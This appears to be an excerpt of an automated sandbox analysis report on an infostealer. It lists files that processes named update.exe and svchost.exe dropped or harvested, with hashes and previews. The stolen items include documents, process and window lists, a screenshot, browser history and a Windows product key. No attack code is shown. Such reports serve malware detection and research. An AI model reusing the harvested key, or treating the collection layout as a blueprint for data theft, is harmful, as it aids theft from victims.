                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):3.5191090305155277
                                                  Encrypted:false
                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                  MD5:3A37312509712D4E12D27240137FF377
                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):190
                                                  Entropy (8bit):3.5497401529130053
                                                  Encrypted:false
                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):504
                                                  Entropy (8bit):3.514398793376306
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\System\Process.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):20373
                                                  Entropy (8bit):5.758571071070943
                                                  Encrypted:false
                                                  SSDEEP:96:+ttrT2Zs9LaCwdMqO23KxcnBg+7UBG8nqACwKB6r8JbE9rfKYO+k2:+ttrT0sNa1dkig50LACwu6wJbE9ri2
                                                  MD5:5C1B87FDD31967C04E040AED31273A89
                                                  SHA1:2039C3C7B2268B858D1E3F8257373FA5B87E25EF
                                                  SHA-256:3296CFCF82A1702CACE1401375C8D71AE9F411B784A595497A3896DC301106B9
                                                  SHA-512:F541A6DE71EDAA99FCF9B8894CFF5B344771086FF423D90D1AB3E349FA4539445F0644AC1FA8B20FC532A2E620BF132CF568B6B54884BB11B4D5080D5BF97406
                                                  Malicious:false
                                                  Preview:NAME: sppsvc..PID: 6464..EXE: ..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 1716..EXE: C:\Users\user\AppData\Roaming\svchost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: Windows Security Health Service..PID: 6024..EXE: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe..NAME: csrss..PID: 420..EXE: ..NAME: backgroundTaskHost..PID: 4292..EXE: C:\Windows\system32\backgroundTaskHost.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: svchost..PID: 5152..EXE: C:\Windows\system32\svchos

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\System\ProductKey.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):29
                                                  Entropy (8bit):3.935398667466764
                                                  Encrypted:false
                                                  SSDEEP:3:j9uyhIS+9m10D:BJZO
                                                  MD5:26091DB69F4A36FA295BE96E9040370F
                                                  SHA1:DFF23596F870E947521D853E896D92C88324FFE8
                                                  SHA-256:1D5640C0191BECDEADD9BE417100194CE6A028DCAC24979852A8FDC72CC7037A
                                                  SHA-512:8F4ED9781DDC5D787D575B3C854A0730671A78B438A59555F597FBB2869C2E2F264BB1B070358F9635A04F3488D3EE5A709651FAA95B4DD450464F5EC1C53FF3
                                                  Malicious:false
                                                  Preview:97XK9-N6YTD-7JJJ3-RCCP6-82GJ7

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\System\ScanningNetworks.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):84
                                                  Entropy (8bit):4.6630509827051725
                                                  Encrypted:false
                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                  Malicious:false
                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\System\Windows.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):15168
                                                  Entropy (8bit):5.743427958844179
                                                  Encrypted:false
                                                  SSDEEP:48:BfERfEsfEYfEGfEXfELfEafEmfEsfEcfEMFfEOfEhfEIfE7fExfEVfEcfEpfEofD:8c9Kqt++h
                                                  MD5:8B231306977EBD952F46B82C046A7E99
                                                  SHA1:C6C7D2C3A5C7795DC4971CAA16CBD1907053DDB6
                                                  SHA-256:1968C4FC3ABED14EF916182DDD8472EA397596DA086AF0FCA9A894BA51CBD8B6
                                                  SHA-512:8A576849CCD143743380A2E2A44F58391A643589E985834D9A3A795A6E48AF229CB95B03C031F7F586F2D33503DB253552881820F827731FDD2533CCAA9FDF5E
                                                  Malicious:false
                                                  Preview:NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 4612..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 3008..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 2136..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 6424..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmmVpgtiYFsz\MYLPLdHNTUihZLdXDCRQCWPdnQySg.exe..NAME: MYLPLdHNTUihZLdXDCRQCWPdnQySg..TITLE: New Tab - Google Chrome..PID: 5988..EXE: C:\Program Files (x86)\cmKvTzJpKsbrEIGaLAwiZeYXliSEcxsBNtmHkIOCPghdHoAkajJTeqmm

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\System\WorldWind.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                  Category:dropped
                                                  Size (bytes):96299
                                                  Entropy (8bit):7.851495961295097
                                                  Encrypted:false
                                                  SSDEEP:1536:COm0uT7hBWKeiJmfLtDFzUG0INKRCHVvTRaBKienvAHt3Tm2SmqdYak+OLS6:Xpti0PzTnNzHbikAHRTQBZX2
                                                  MD5:6AEF9BD3751EBB22DCE5F6772FC14C4E
                                                  SHA1:8B51AE657AA2453D2D676F1160D77C798335D986
                                                  SHA-256:E74D1F406B4F394B4CE27A9ED21B96B475B154A8D38E9CE3106C323CBEB6B117
                                                  SHA-512:DB643B5C4822D89948FC338901036F99B155259BDA8464C1B72BB593719672B5AC53E90DABC9C953B523944E123264A6103015893D887F7EC4B435225CB284BD
                                                  Malicious:false
                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH.zip

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:modified
                                                  Size (bytes):160371
                                                  Entropy (8bit):7.930026562248578
                                                  Encrypted:false
                                                  SSDEEP:3072:6Z6xL58ZtKJ2It/QeSn/+XbOB24dK35H+h/7Jq:b/QF/CbX/5H+h/7o
                                                  MD5:86FFCFAFBF9D96DBCF9A3E4CA4F260F5
                                                  SHA1:20BF1FF6C55D317DE4E68A74F3CA4C974ACF66C0
                                                  SHA-256:596E5DB2063045E1BD1525BF80A317D0E06A9BF9BEE713BB99522C12A99566EF
                                                  SHA-512:0E5A01E4D7CBEA29A4D096CD8BACE9FF352E3B214BA6030271041FB847393754216362257DEC1B83E09ED2F45EC4616334DFC4FF9C86CE056D675255CCEDBFA1
                                                  Malicious:false
                                                  Preview:PK.........(#Y................Browsers\Edge\PK.........(#Y................Browsers\Google\PK..........#Yc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK..........#Y0...5...........Directories\Desktop.txteR.r. .>.3}..}..A..P...-.N.k.I.>~...7wG..%.......o.b..&..rS...6qi...ab..U 5..O.y....e.WT44.Y.......kK.$!...g....T....?.g2.rfp...{.p....Gb..FS.h.7!$>JLL..n.z$.Xz*L*.'h........K.0..6.tC....M.OHA.....,,y..@.@....<....mk.'.q...HYx+,x&.O....$...7..B.Q7u._.6.....{ .4....*........}N........:.[.J.<.......PK..........#Y.+>.d...........Directories\Documents.txtm.Kn.0...T..r.6=...Gl..K.D@+.$..T..+..P..g...G}};....}..RH*....[..........<w....~y&.M_.'.J.p.y./$)*...r..a*.ey.p......;QB..m}.4.i.G....Q"..Rb\J.7@...T`.\.5J.!..U!.f...,r.J...$...R.M"Y...T.(..Jq.T...g....fl.....vw../......Z...^...?..x.n....[.N..Y.......L.f"u.t..r........p...r....3O.1.1ACOkK.p.sE...................].G...\...5.5.....

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Browsers\Firefox\History.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):94
                                                  Entropy (8bit):4.886397362842801
                                                  Encrypted:false
                                                  SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                  MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                  SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                  SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                  SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                  Malicious:false
                                                  Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\Desktop.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):814
                                                  Entropy (8bit):5.23736360478791
                                                  Encrypted:false
                                                  SSDEEP:24:ChXIYyFteIqxj3Cvj8zSYCE19tDvTPupjucWjq:cXIYseIqxj3CQzSZE19tDrPupjuljq
                                                  MD5:1B0D52E28F02B57E0D1C044E42C567A7
                                                  SHA1:F5D7EFB021881DC867CAEA4EE99597D592B60B30
                                                  SHA-256:1E5407FDF60271E55C10CAB6252CF4706DAFE25AE144D80823F5FCDD372BBB1E
                                                  SHA-512:B5AC9573931BE5E905942FB228655B781285DBDF519E8174F3D772793AD37C82F284CF960EDC7E9B4B64ED535A75A039ED46D7E5F34EE93EE14B2514CBF2C8CF
                                                  Malicious:false
                                                  Preview:Desktop\...DUUDTUBZFW\...EEGWXUHVUG\....BJZFPPWAPT.png....EEGWXUHVUG.docx....EFOYFBOLXA.pdf....GRXZDKKVDB.jpg....NVWZAPQSQL.xlsx....PALRGUCVEH.mp3...EFOYFBOLXA\....EFOYFBOLXA.docx....GIGIYTFFYT.jpg....JDDHMPCDUJ.png....PALRGUCVEH.xlsx....ZGGKNSUKOP.pdf....ZIPXYXWIOY.mp3...EOWRVPQCCS\...GLTYDMDUST\...LIJDSFKJZG\...NVWZAPQSQL\....EIVQSAOTAQ.png....EOWRVPQCCS.jpg....GIGIYTFFYT.mp3....GRXZDKKVDB.xlsx....NVWZAPQSQL.docx....PALRGUCVEH.pdf...QCOILOQIKC\...TQDFJHPUIU\...BJZFPPWAPT.png...BTC.exe...desktop.ini...EEGWXUHVUG.docx...EFOYFBOLXA.docx...EFOYFBOLXA.pdf...EIVQSAOTAQ.png...EOWRVPQCCS.jpg...Excel.lnk...GIGIYTFFYT.jpg...GIGIYTFFYT.mp3...GRXZDKKVDB.jpg...GRXZDKKVDB.xlsx...JDDHMPCDUJ.png...NVWZAPQSQL.docx...NVWZAPQSQL.xlsx...PALRGUCVEH.mp3...PALRGUCVEH.pdf...PALRGUCVEH.xlsx...ZGGKNSUKOP.pdf...ZIPXYXWIOY.mp3..

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Directories\Documents.txt

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):946
                                                  Entropy (8bit):5.374016320731802
                                                  Encrypted:false
                                                  SSDEEP:24:QJhXIYyFteIqxj38xrqEEnvj8zSYCZ9tDvupjucWjq:Q7XIYseIqxj38BqEEnQzSZZ9tDmpjulu
                                                  MD5:7ECFE495FA4D93F25F904F0648C039A2
                                                  SHA1:3153CAE93B272237914852A85357F744328099F9
                                                  SHA-256:A0BA8E7E4D12DA4A13DF2B425F2BD3D2C72CC94795F74E0E2284A7F8F3213FBC
